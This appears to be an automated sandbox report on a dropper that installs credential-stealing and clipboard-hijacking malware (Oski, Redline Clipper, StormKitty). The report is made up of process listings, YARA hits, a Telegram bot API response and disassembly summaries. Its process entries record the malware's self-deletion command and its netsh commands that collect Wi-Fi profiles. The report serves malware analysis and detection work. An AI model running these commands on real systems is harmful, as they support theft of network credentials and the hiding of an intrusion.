2022-01-14 12:49:39 UTC	743	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 31 34 35 36 36 30 39 33 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 63 5c 75 64 64 39 38 48 65 6c 70 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 59 30 75 5f 48 65 6c 70 5f 62 6f 74 22 2c 22 63 61 6e 5f 6a 6f 69 6e 5f 67 72 6f 75 70 73 22 3a 66 61 6c 73 65 2c 22 63 61 6e 5f 72 65 61 64 5f 61 6c 6c 5f 67 72 6f 75 70 5f 6d 65 73 73 61 67 65 73 22 3a 74 72 75 65 2c 22 73 75 70 70 6f 72 74 73 5f 69 6e 6c 69 6e 65 5f 71 75 65 72 69 65 73 22 3a 74 72 75 65 7d 7d Data Ascii: {"ok":true,"result":{"id":1456609378,"is_bot":true,"first_name":"\ud83c\udd98Help_bot","username":"Y0u_Help_bot","can_join_groups":false,"can_read_all_group_messages":true,"supports_inline_queries":true}}

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe PID: 5860 Parent PID: 2220

General

Start time:	13:49:15
Start date:	14/01/2022
Path:	C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe"
Imagebase:	0x920000
File size:	888320 bytes
MD5 hash:	39BFD2CE7CFFEAFC8F4D85D89FD6F072
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: svchoste.exe PID: 4648 Parent PID: 5860

General

Start time:	13:49:19
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\svchoste.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\svchoste.exe"
Imagebase:	0xb70000
File size:	204800 bytes
MD5 hash:	9F209B4720986407A79BD4C598087587
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Oski_1, Description: Yara detected Oski Stealer, Source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: C:\Users\user\AppData\Local\Temp\svchoste.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira
Reputation:	low

Chronological Activities

Analysis Process: dll.exe PID: 5360 Parent PID: 5860

General

Start time:	13:49:20
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\dll.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\dll.exe"
Imagebase:	0x10000
File size:	34304 bytes
MD5 hash:	461CBDD5B0D2801A736E21AEF6C7CED3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000005.00000002.304102093.0000000002341000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: chormuimii.exe PID: 3556 Parent PID: 5860

General

Start time:	13:49:20
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\chormuimii.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\chormuimii.exe"
Imagebase:	0x400000
File size:	650752 bytes
MD5 hash:	535BD46107780DBB3425E23C175E85F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, Author: Joe Security Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Oski, Description: Yara detected Oski Stealer, Source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: taskshell.exe PID: 6056 Parent PID: 5360

General

Start time:	13:49:21
Start date:	14/01/2022
Path:	C:\ProgramData\AMD Driver\taskshell.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\AMD Driver\taskshell.exe"
Imagebase:	0x640000
File size:	10752 bytes
MD5 hash:	B335EEB40D0443DADCDEFC578A23B5DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000007.00000002.555066111.0000000000642000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000007.00000000.302503110.0000000000642000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: C:\ProgramData\AMD Driver\taskshell.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 40%, Metadefender, Browse Detection: 75%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: chormuim.exe PID: 6504 Parent PID: 3556

General

Start time:	13:49:24
Start date:	14/01/2022
Path:	C:\Users\user\AppData\Local\Temp\chormuim.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\chormuim.exe"
Imagebase:	0x280000
File size:	366592 bytes
MD5 hash:	69450EC78E3AA15178A8A90079551137
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000000.370467159.00000000027FF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.406666147.00000000027FF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: 00000008.00000000.369418381.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: 00000008.00000002.405182174.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000000.356149280.00000000027FF000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: 00000008.00000000.353524841.0000000000730000.00000004.00020000.sdmp, Author: Arnim Rupp Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, Author: Arnim Rupp Rule: HKTL_NET_GUID_StormKitty, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\chormuim.exe, Author: Arnim Rupp
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 6672 Parent PID: 4648

General

Start time:	13:49:34
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /pid 4648 & erase C:\Users\user\AppData\Local\Temp\svchoste.exe & RD /S /Q C:\\ProgramData\\216363876181815\\* & exit
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6676 Parent PID: 6672

General

Start time:	13:49:34
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskshell.exe PID: 3132 Parent PID: 3352

General

Start time:	13:49:35
Start date:	14/01/2022
Path:	C:\ProgramData\AMD Driver\taskshell.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\AMD Driver\taskshell.exe"
Imagebase:	0xd90000
File size:	10752 bytes
MD5 hash:	B335EEB40D0443DADCDEFC578A23B5DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 0000000C.00000002.555072443.0000000000D92000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 0000000C.00000000.330943519.0000000000D92000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: taskkill.exe PID: 4248 Parent PID: 6672

General

Start time:	13:49:35
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /pid 4648
Imagebase:	0x1310000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskshell.exe PID: 6772 Parent PID: 3352

General

Start time:	13:49:43
Start date:	14/01/2022
Path:	C:\ProgramData\AMD Driver\taskshell.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\AMD Driver\taskshell.exe"
Imagebase:	0x310000
File size:	10752 bytes
MD5 hash:	B335EEB40D0443DADCDEFC578A23B5DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000010.00000000.348480456.0000000000312000.00000002.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000010.00000002.555084428.0000000000312000.00000002.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 5880 Parent PID: 6504

General

Start time:	13:49:43
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x7ff6221d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msiexec.exe PID: 6756 Parent PID: 572

General

Start time:	13:49:43
Start date:	14/01/2022
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff78ff80000
File size:	66048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5808 Parent PID: 5880

General

Start time:	13:49:44
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: chcp.com PID: 1716 Parent PID: 5880

General

Start time:	13:49:45
Start date:	14/01/2022
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff721b20000
File size:	14336 bytes
MD5 hash:	4900AF1B0DA341B5FCF469D59DAD2593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: netsh.exe PID: 1304 Parent PID: 5880

General

Start time:	13:49:45
Start date:	14/01/2022
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff67c400000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: findstr.exe PID: 4844 Parent PID: 5880

General

Start time:	13:49:46
Start date:	14/01/2022
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr All
Imagebase:	0x7ff6a9cf0000
File size:	34304 bytes
MD5 hash:	BCC8F29B929DABF5489C9BE6587FF66D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 1860 Parent PID: 6504

General

Start time:	13:49:47
Start date:	14/01/2022
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x7ff6221d0000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6644 Parent PID: 1860

General

Start time:	13:49:48
Start date:	14/01/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: chcp.com PID: 6744 Parent PID: 1860

General

Start time:	13:49:48
Start date:	14/01/2022
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff721b20000
File size:	14336 bytes
MD5 hash:	4900AF1B0DA341B5FCF469D59DAD2593
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: netsh.exe PID: 5536 Parent PID: 1860

General

Start time:	13:49:51
Start date:	14/01/2022
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff67c400000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 404 Parent PID: 6504

General

Start time:	13:49:54
Start date:	14/01/2022
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Imagebase:	0x7ff602390000
File size:	494488 bytes
MD5 hash:	2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: WerFault.exe PID: 756 Parent PID: 6504

General

Start time:	13:49:56
Start date:	14/01/2022
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6504 -s 1360
Imagebase:	0x7ff602390000
File size:	494488 bytes
MD5 hash:	2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe PID: 5860 Parent PID: 2220 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exeCOMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	6.2%
Signature Coverage:	0%
Total number of Nodes:	97
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFC08957C8C, Relevance: 1.7, APIs: 1, Instructions: 195
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE ref: 00007FFC08957DE7

Memory Dump Source

Source File: 00000000.00000002.301849545.00007FFC08950000.00000040.00000001.sdmp, Offset: 00007FFC08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc08950000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 9a7774cebc041f7204070a31bdbf9ec1d2b5e0e4c92820960d4661f51aabd89d
Instruction ID: ed6c8cbaa3a8c57b0f86ca1d49938a1f0cb08f5917a2ea39797cc3c7c1cde02d
Opcode Fuzzy Hash: 9a7774cebc041f7204070a31bdbf9ec1d2b5e0e4c92820960d4661f51aabd89d
Instruction Fuzzy Hash: A461B33180D7C55FD7079B648C65AA57FB0EF13210F0942EBC089CB1E3DA68684AC762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC089570BA, Relevance: 1.6, APIs: 1, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE ref: 00007FFC08957DE7

Memory Dump Source

Source File: 00000000.00000002.301849545.00007FFC08950000.00000040.00000001.sdmp, Offset: 00007FFC08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc08950000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 6a6effd994c107174228e9b8d4b1d56028c72ea223e73a21b575bce2b099ef88
Instruction ID: e8ebf1d94a7921ca33c35dbdb8684f8c0665ffa3300a6ee399f423820dbbae69
Opcode Fuzzy Hash: 6a6effd994c107174228e9b8d4b1d56028c72ea223e73a21b575bce2b099ef88
Instruction Fuzzy Hash: B5218E31908A1C9FDB58DF99D849BF9BBE0EB65321F00822ED00AD3691DB70A456CB91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFC08955E77, Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.301849545.00007FFC08950000.00000040.00000001.sdmp, Offset: 00007FFC08950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffc08950000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddc93e38a96d58df2e057d12237952a79531e266b01e156ad40d9c1d1616e35
Instruction ID: 2bd4139fc2e9bfd9083ee8f02f05edeac469bf04862188497cb48d8b9ce3f5ca
Opcode Fuzzy Hash: 0ddc93e38a96d58df2e057d12237952a79531e266b01e156ad40d9c1d1616e35
Instruction Fuzzy Hash: 47D1CEA644E7C15FD7038BB458B66913FB0AF27218B0F49DBC4C0CF4A3E6185A5AD762

Uniqueness

Uniqueness Score: -1.00%

Function 00962BA2, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 00962C18
_strcpy_s.LIBCMT ref: 00962C5A
_strlen.LIBCMT ref: 00962C76
_strlen.LIBCMT ref: 00962C83
_strcat_s.LIBCMT ref: 00962CC3
_strcat_s.LIBCMT ref: 00962CE8
_strlen.LIBCMT ref: 00962D38

Strings

\9B, xrefs: 00962C8F
a6B, xrefs: 00962C36
H6B, xrefs: 00962C12

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: _strlen$_strcat_s_strcpy_s
String ID: H6B$\9B$a6B
API String ID: 1995852981-2097220140
Opcode ID: 4d517327ace502a79a8d5966451da0be3aabafa69b6996a688a6c8637f1476ef
Instruction ID: 612e855b88cfe986637dee1ac197a7bf36082ee33c72a871d9465eb6b151493e
Opcode Fuzzy Hash: 4d517327ace502a79a8d5966451da0be3aabafa69b6996a688a6c8637f1476ef
Instruction Fuzzy Hash: 3E418DB3B0461176E7217BB49D4AF7D23185F667D1F180031FE08A11E2FA6ACE4B8296

Uniqueness

Uniqueness Score: -1.00%

Function 0096B181, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 333COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 0096B3A4
__freea.LIBCMT ref: 0096B3AD
___ansicp.LIBCMT ref: 0096B3DE
___convertcp.LIBCMT ref: 0096B409

Part of subcall function 0096BB69: _strlen.LIBCMT ref: 0096BBEB
Part of subcall function 0096BB69: _memset.LIBCMT ref: 0096BC63
Part of subcall function 0096BB69: __freea.LIBCMT ref: 0096BD02

_memset.LIBCMT ref: 0096B484
___convertcp.LIBCMT ref: 0096B4BA
__freea.LIBCMT ref: 0096B4CF

Strings

;4"B, xrefs: 0096B51F

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __freea$___convertcp_memset$___ansicp_strlen
String ID: ;4"B
API String ID: 715567236-4273704327
Opcode ID: 93e0ed55ca0911f4f5c331a29490a3d0b843cebaaf77ab5eb96c5b44aea388b5
Instruction ID: 087ea9267cd49730cf60e89b65bba3c57e404be603f39e54d113b8f3dd056fb0
Opcode Fuzzy Hash: 93e0ed55ca0911f4f5c331a29490a3d0b843cebaaf77ab5eb96c5b44aea388b5
Instruction Fuzzy Hash: 7BC18877A08550AEEB209FB0DD80AAC37B5E348358F198926FF15E2A19FB348D85D750

Uniqueness

Uniqueness Score: -1.00%

Function 0095FDC2, Relevance: 10.7, APIs: 7, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0095FE24
_memcpy_s.LIBCMT ref: 0095FE99
__fileno.LIBCMT ref: 0095FEF9
__read.LIBCMT ref: 0095FF00
__filbuf.LIBCMT ref: 0095FF24
_memset.LIBCMT ref: 0095FF6A
_memset.LIBCMT ref: 0095FF95

Part of subcall function 009600C1: __getptd_noexit.LIBCMT ref: 009600C1

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 7e2ac98bbe2e49b42b4befdaedb2130cd2e232687f2c61f5f2b88be43a6daddb
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 0951CF33A00200EFE720DF7A9965A9D7B75E780379B248635FF2492999E7349E4DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0096083D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 009607C8
__fileno.LIBCMT ref: 009607D6
__fileno.LIBCMT ref: 009607E2
__fileno.LIBCMT ref: 009607EE
__fileno.LIBCMT ref: 009607FE

Part of subcall function 009600C1: __getptd_noexit.LIBCMT ref: 009600C1

Strings

'B, xrefs: 0096080F

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_920000_18719D6856A09A622001F1C325067D56AFA63BD21FBAD.jbxd

Similarity

API ID: __fileno$__getptd_noexit__lock_file
String ID: 'B
API String ID: 3755561058-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: 531c2e1a472bfa31bcc0009c36af6d5a6ce36a0eb73ca5df27dd83fd02903119
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 570126331086505AC211BB787D92B3E7760DAC2B70B7AC710F6609B2C2DA28DA82D685

Uniqueness

Uniqueness Score: -1.00%

Function 0096B56B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0096B666
__freea.LIBCMT ref: 0096B693
___ansicp.LIBCMT ref: 0096B6BD
___convertcp.LIBCMT ref: 0096B6DE

Part of subcall function 0096BB69: _strlen.LIBCMT ref: 0096BBEB
Part of subcall function 0096BB69: _memset.LIBCMT ref: 0096BC63
Part of subcall function 0096BB69: __freea.LIBCMT ref: 0096BD02

Strings

;4"B, xrefs: 0096B71E

Memory Dump Source

Source File: 00000000.00000002.300930896.0000000000934000.00000002.00020000.sdmp, Offset: 00920000, based on PE: true

Associated: 00000000.00000002.300917652.0000000000920000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.300921740.0000000000922000.00000002.00020000.sdmp Download File
